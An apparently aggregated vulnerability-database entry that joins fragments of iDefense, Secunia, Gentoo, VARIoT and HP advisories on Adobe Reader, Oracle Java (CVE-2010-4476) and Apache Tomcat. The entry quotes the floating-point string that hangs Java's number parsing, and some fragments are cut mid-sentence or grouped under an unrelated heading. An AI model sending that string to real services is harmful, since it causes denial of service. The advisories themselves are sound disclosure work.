11/17/2010 Initial Vendor Reply
02/08/2011 Coordinated Public Disclosure
IX.
Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php
Free tools, research and upcoming events
http://labs.idefense.com/
X. LEGAL NOTICES
Copyright \xa9 2011 iDefense, Inc.
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information. ----------------------------------------------------------------------
Get a tax break on purchases of Secunia Solutions!
If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at:
http://secunia.com/products/corporate/vim/section_179/
----------------------------------------------------------------------
TITLE:
Adobe Reader / Acrobat Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA43207
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43207/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43207
RELEASE DATE:
2011-02-09
DISCUSS ADVISORY:
http://secunia.com/advisories/43207/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/43207/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43207
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Adobe Reader /
Acrobat, which can be exploited by malicious, local users to gain
escalated privileges and by malicious people to conduct cross-site
scripting attacks and compromise a user's system.
2) An unspecified error can be exploited to corrupt memory.
3) An unspecified error related to file permissions in Windows-based
versions can be exploited to gain escalated privileges.
4) An unspecified error may allow code execution.
5) An unspecified error when parsing images can be exploited to
corrupt memory.
6) An error in AcroRd32.dll when parsing certain images can be
exploited to corrupt memory.
7) An unspecified error in the Macintosh-based versions may allow
code execution.
9) An unspecified error may allow code execution.
10) A input validation error may allow code execution.
11) An input validation error can be exploited to conduct cross-site
scripting attacks.
13) An unspecified error can be exploited to corrupt memory.
14) A boundary error when decoding U3D image data in an IFF file can
be exploited to cause a buffer overflow.
15) A boundary error when decoding U3D image data in a RGBA file can
be exploited to cause a buffer overflow.
16) A boundary error when decoding U3D image data in a BMP file can
be exploited to cause a buffer overflow.
17) A boundary error when decoding U3D image data in a PSD file can
be exploited to cause a buffer overflow.
18) An input validation error when parsing fonts may allow code
execution.
19) A boundary error when decoding U3D image data in a FLI file can
be exploited to cause a buffer overflow.
20) An error in 2d.dll when parsing height and width values of RLE_8
compressed BMP files can be exploited to cause a heap-based buffer
overflow.
21) An integer overflow in ACE.dll when parsing certain ICC data can
be exploited to cause a buffer overflow.
22) A boundary error in rt3d.dll when parsing bits per pixel and
number of colors if 4/8-bit RLE compressed BMP files can be exploited
to cause a heap-based buffer overflow.
23) An error in the U3D implementation when handling the Parent Node
count can be exploited to cause a buffer overflow.
24) A boundary error when processing JPEG files embedded in a PDF
file can be exploited to corrupt heap memory.
25) An unspecified error when parsing images may allow code
execution.
26) An input validation error can be exploited to conduct cross-site
scripting attacks.
27) An unspecified error in the Macintosh-based versions may allow
code execution.
28) A boundary error in rt3d.dll when parsing certain files can be
exploited to cause a stack-based buffer overflow.
29) An integer overflow in the U3D implementation when parsing a ILBM
texture file can be exploited to cause a buffer overflow.
30) Some vulnerabilities are caused due to vulnerabilities in the
bundled version of Adobe Flash Player.
For more information:
SA43267
The vulnerabilities are reported in versions 8.2.5 and prior, 9.4.1
and prior, and 10.0 and prior.
SOLUTION:
Update to version 8.2.6, 9.4.2, or 10.0.1.
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
PROVIDED AND/OR DISCOVERED BY:
2) Bing Liu, Fortinet's FortiGuard Labs.
6) Abdullah Ada via ZDI.
8) Haifei Li, Fortinet's FortiGuard Labs.
14 - 17, 19, 20, 22, 29) Peter Vreugdenhil via ZDI.
21) Sebastian Apelt via ZDI.
23) el via ZDI.
14) Sean Larsson, iDefense Labs.
28) An anonymous person via ZDI.
The vendor also credits:
1) Mitja Kolsek, ACROS Security.
3) Matthew Pun.
4, 5, 18) Tavis Ormandy, Google Security Team.
7) James Quirk.
9) Brett Gervasoni, Sense of Security.
10) Joe Schatz.
11, 26) Billy Rios, Google Security Team.
12) Greg MacManus, iSIGHT Partners Labs and Parvez Anwar.
13) CESG.
25) Will Dormann, CERT.
27) Marc Schoenefeld, Red Hat Security Response Team.
ORIGINAL ADVISORY:
Adobe (APSB11-03)
http://www.adobe.com/support/security/bulletins/apsb11-03.html
http://www.adobe.com/support/security/bulletins/apsb11-02.html
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-11-065/
http://www.zerodayinitiative.com/advisories/ZDI-11-066/
http://www.zerodayinitiative.com/advisories/ZDI-11-067/
http://www.zerodayinitiative.com/advisories/ZDI-11-068/
http://www.zerodayinitiative.com/advisories/ZDI-11-069/
http://www.zerodayinitiative.com/advisories/ZDI-11-070/
http://www.zerodayinitiative.com/advisories/ZDI-11-071/
http://www.zerodayinitiative.com/advisories/ZDI-11-072/
http://www.zerodayinitiative.com/advisories/ZDI-11-073/
http://www.zerodayinitiative.com/advisories/ZDI-11-074/
http://www.zerodayinitiative.com/advisories/ZDI-11-075/
http://www.zerodayinitiative.com/advisories/ZDI-11-077/
FortiGuard Labs:
http://www.fortiguard.com/advisory/FGA-2011-06.html
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=891
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-text/acroread < 9.4.7 >= 9.4.7=20
Description
===========
Multiple vulnerabilities have been discovered in Adobe Reader. Please
review the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Reader users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-text/acroread-9.4.7"
References
==========
[ 1 ] CVE-2010-4091
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4091
[ 2 ] CVE-2011-0562
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0562
[ 3 ] CVE-2011-0563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0563
[ 4 ] CVE-2011-0565
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0565
[ 5 ] CVE-2011-0566
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0566
[ 6 ] CVE-2011-0567
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0567
[ 7 ] CVE-2011-0570
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0570
[ 8 ] CVE-2011-0585
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0585
[ 9 ] CVE-2011-0586
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0586
[ 10 ] CVE-2011-0587
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0587
[ 11 ] CVE-2011-0588
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0588
[ 12 ] CVE-2011-0589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589
[ 13 ] CVE-2011-0590
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0590
[ 14 ] CVE-2011-0591
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0591
[ 15 ] CVE-2011-0592
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0592
[ 16 ] CVE-2011-0593
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0593
[ 17 ] CVE-2011-0594
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0594
[ 18 ] CVE-2011-0595
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0595
[ 19 ] CVE-2011-0596
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0596
[ 20 ] CVE-2011-0598
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0598
[ 21 ] CVE-2011-0599
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0599
[ 22 ] CVE-2011-0600
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0600
[ 23 ] CVE-2011-0602
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0602
[ 24 ] CVE-2011-0603
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0603
[ 25 ] CVE-2011-0604
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0604
[ 26 ] CVE-2011-0605
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0605
[ 27 ] CVE-2011-0606
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0606
[ 28 ] CVE-2011-2130
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130
[ 29 ] CVE-2011-2134
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134
[ 30 ] CVE-2011-2135
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135
[ 31 ] CVE-2011-2136
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136
[ 32 ] CVE-2011-2137
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137
[ 33 ] CVE-2011-2138
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138
[ 34 ] CVE-2011-2139
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139
[ 35 ] CVE-2011-2140
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140
[ 36 ] CVE-2011-2414
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414
[ 37 ] CVE-2011-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415
[ 38 ] CVE-2011-2416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416
[ 39 ] CVE-2011-2417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417
[ 40 ] CVE-2011-2424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424
[ 41 ] CVE-2011-2425
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425
[ 42 ] CVE-2011-2431
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2431
[ 43 ] CVE-2011-2432
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2432
[ 44 ] CVE-2011-2433
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2433
[ 45 ] CVE-2011-2434
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2434
[ 46 ] CVE-2011-2435
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2435
[ 47 ] CVE-2011-2436
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2436
[ 48 ] CVE-2011-2437
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2437
[ 49 ] CVE-2011-2438
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2438
[ 50 ] CVE-2011-2439
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2439
[ 51 ] CVE-2011-2440
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2440
[ 52 ] CVE-2011-2441
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2441
[ 53 ] CVE-2011-2442
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2442
[ 54 ] CVE-2011-2462
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2462
[ 55 ] CVE-2011-4369
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4369
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201201-19.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2012 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
| VAR-201102-0280 | CVE-2010-4476 |
IBM WebSphere Application Server vulnerable to denial-of-service (DoS)
Related entries in the VARIoT exploits database: VAR-E-201003-0021, VAR-E-201102-0765 |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The Double.parseDouble method in Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier, as used in OpenJDK, Apache, JBossweb, and other products, allows remote attackers to cause a denial of service via a crafted string that triggers an infinite loop of estimations during conversion to a double-precision binary floating-point number, as demonstrated using 2.2250738585072012e-308. A wide range of products are affected. plural Oracle Product Java Runtime Environment Components include Java language and APIs There are vulnerabilities that affect availability due to flaws in the handling of.Service disruption by a third party (DoS) An attack may be carried out. IBM WebSphere Application Server (WAS) contains a denial-of-service (DoS) vulnerability. IBM WebSphere Application Server contains a denial-of-service (DoS) vulnerability due to an issue in Java Runtime Environment (JRE). According to the developer: " For other IBM software products that contain an affected version of WAS, require an update. Specifically, WebSphere Process Server (WPS), WebSphere Enterprise Service Bus (WESB), WebSphere Virtual Enterprise (WVE), WebSphere Commerce and others are applicable. Also, IBM HTTP Server is not affected by this vulnerability."A remote attacker may cause a denial-of-service (DoS). - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201111-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Oracle JRE/JDK: Multiple vulnerabilities
Date: November 05, 2011
Bugs: #340421, #354213, #370559, #387851
ID: 201111-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in the Oracle JRE/JDK,
allowing attackers to cause unspecified impact.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-java/sun-jre-bin < 1.6.0.29 >= 1.6.0.29 *
2 app-emulation/emul-linux-x86-java
< 1.6.0.29 >= 1.6.0.29 *
3 dev-java/sun-jdk < 1.6.0.29 >= 1.6.0.29 *
-------------------------------------------------------------------
NOTE: Packages marked with asterisks require manual intervention!
-------------------------------------------------------------------
3 affected packages
-------------------------------------------------------------------
Description
===========
Multiple vulnerabilities have been reported in the Oracle Java
implementation. Please review the CVE identifiers referenced below and
the associated Oracle Critical Patch Update Advisory for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Oracle JDK 1.6 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-java/sun-jdk-1.6.0.29"
All Oracle JRE 1.6 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-java/sun-jre-bin-1.6.0.29"
All users of the precompiled 32-bit Oracle JRE 1.6 should upgrade to
the latest version:
# emerge --sync
# emerge -a -1 -v ">=app-emulation/emul-linux-x86-java-1.6.0.29"
NOTE: As Oracle has revoked the DLJ license for its Java
implementation, the packages can no longer be updated automatically.
This limitation is not present on a non-fetch restricted implementation
such as dev-java/icedtea-bin.
References
==========
[ 1 ] CVE-2010-3541
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3541
[ 2 ] CVE-2010-3548
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3548
[ 3 ] CVE-2010-3549
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3549
[ 4 ] CVE-2010-3550
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3550
[ 5 ] CVE-2010-3551
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3551
[ 6 ] CVE-2010-3552
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3552
[ 7 ] CVE-2010-3553
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3553
[ 8 ] CVE-2010-3554
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3554
[ 9 ] CVE-2010-3555
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3555
[ 10 ] CVE-2010-3556
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3556
[ 11 ] CVE-2010-3557
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3557
[ 12 ] CVE-2010-3558
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3558
[ 13 ] CVE-2010-3559
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3559
[ 14 ] CVE-2010-3560
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3560
[ 15 ] CVE-2010-3561
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3561
[ 16 ] CVE-2010-3562
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3562
[ 17 ] CVE-2010-3563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3563
[ 18 ] CVE-2010-3565
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3565
[ 19 ] CVE-2010-3566
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3566
[ 20 ] CVE-2010-3567
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3567
[ 21 ] CVE-2010-3568
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3568
[ 22 ] CVE-2010-3569
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3569
[ 23 ] CVE-2010-3570
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3570
[ 24 ] CVE-2010-3571
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3571
[ 25 ] CVE-2010-3572
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3572
[ 26 ] CVE-2010-3573
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3573
[ 27 ] CVE-2010-3574
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3574
[ 28 ] CVE-2010-4422
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4422
[ 29 ] CVE-2010-4447
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4447
[ 30 ] CVE-2010-4448
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4448
[ 31 ] CVE-2010-4450
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4450
[ 32 ] CVE-2010-4451
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4451
[ 33 ] CVE-2010-4452
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4452
[ 34 ] CVE-2010-4454
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4454
[ 35 ] CVE-2010-4462
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4462
[ 36 ] CVE-2010-4463
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4463
[ 37 ] CVE-2010-4465
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4465
[ 38 ] CVE-2010-4466
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4466
[ 39 ] CVE-2010-4467
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4467
[ 40 ] CVE-2010-4468
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4468
[ 41 ] CVE-2010-4469
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4469
[ 42 ] CVE-2010-4470
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4470
[ 43 ] CVE-2010-4471
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4471
[ 44 ] CVE-2010-4472
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4472
[ 45 ] CVE-2010-4473
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4473
[ 46 ] CVE-2010-4474
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4474
[ 47 ] CVE-2010-4475
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4475
[ 48 ] CVE-2010-4476
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4476
[ 49 ] CVE-2011-0802
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0802
[ 50 ] CVE-2011-0814
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0814
[ 51 ] CVE-2011-0815
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0815
[ 52 ] CVE-2011-0862
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0862
[ 53 ] CVE-2011-0863
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0863
[ 54 ] CVE-2011-0864
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0864
[ 55 ] CVE-2011-0865
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0865
[ 56 ] CVE-2011-0867
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0867
[ 57 ] CVE-2011-0868
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0868
[ 58 ] CVE-2011-0869
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0869
[ 59 ] CVE-2011-0871
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0871
[ 60 ] CVE-2011-0872
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0872
[ 61 ] CVE-2011-0873
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0873
[ 62 ] CVE-2011-3389
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3389
[ 63 ] CVE-2011-3516
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3516
[ 64 ] CVE-2011-3521
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3521
[ 65 ] CVE-2011-3544
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3544
[ 66 ] CVE-2011-3545
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3545
[ 67 ] CVE-2011-3546
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3546
[ 68 ] CVE-2011-3547
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3547
[ 69 ] CVE-2011-3548
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3548
[ 70 ] CVE-2011-3549
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3549
[ 71 ] CVE-2011-3550
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3550
[ 72 ] CVE-2011-3551
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3551
[ 73 ] CVE-2011-3552
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3552
[ 74 ] CVE-2011-3553
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3553
[ 75 ] CVE-2011-3554
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3554
[ 76 ] CVE-2011-3555
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3555
[ 77 ] CVE-2011-3556
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3556
[ 78 ] CVE-2011-3557
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3557
[ 79 ] CVE-2011-3558
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3558
[ 80 ] CVE-2011-3560
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3560
[ 81 ] CVE-2011-3561
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3561
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201111-02.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2011 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. For technical reasons, this update will
be released separately.
The updates are available from: http://www.hp.com/go/java
These issues are addressed in the following versions of the HP Java:
HP-UX B.11.11 / SDK and JRE v1.4.2.28 or subsequent
HP-UX B.11.23 / SDK and JRE v1.4.2.28 or subsequent
HP-UX B.11.31 / SDK and JRE v1.4.2.28 or subsequent
MANUAL ACTIONS: Yes - Update
For Java v1.4.2.27 and earlier, update to Java v1.4.2.28 or subsequent. ----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM).
Request a free trial:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
Apache Tomcat Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA43198
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43198/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43198
RELEASE DATE:
2011-02-07
DISCUSS ADVISORY:
http://secunia.com/advisories/43198/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/43198/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43198
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Apache Tomcat, which
can be exploited by malicious, local users to bypass certain security
restrictions and by malicious people to conduct cross-site scripting
attacks and cause a DoS (Denial of Service).
1) An error due to the "ServletContect" attribute improperly being
restricted to read-only when running under a SecurityManager can be
exploited by a malicious web application to use an arbitrary working
directory with read-write privileges.
2) Certain input (e.g. display names) is not properly sanitised in
the HTML Manager interface before being returned to the user.
3) An error within the JVM when accessing a page that calls
"javax.servlet.ServletRequest.getLocale()" or
"javax.servlet.ServletRequest.getLocales()" functions can be
exploited to cause the process to hang via a web request containing
specially crafted headers (e.g. "Accept-Language").
This vulnerability is reported in versions prior to 5.5.33.
PROVIDED AND/OR DISCOVERED BY:
1, 2) Reported by the vendor.
3) Konstantin Preiber
ORIGINAL ADVISORY:
Apache Tomcat:
http://tomcat.apache.org/security-5.html
http://archives.neohapsis.com/archives/fulldisclosure/2011-02/0075.html
Konstantin Preiber:
http://www.exploringbinary.com/why-volatile-fixes-the-2-2250738585072011e-308-bug/comment-page-1/#comment-4645
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
HP OpenVMS running J2SE 1.42 on Alpha platforms: v 1.42-9 and earlier.
HP OpenVMS running J2SE 1.42 on I64 platforms: v 1.42-6 and earlier.
HP OpenVMS running J2SE 5.0 on Alpha platforms: v 1.50-7 and earlier.
HP OpenVMS running J2SE 5.0 on I64 platforms: v 1.50-6 and earlier.
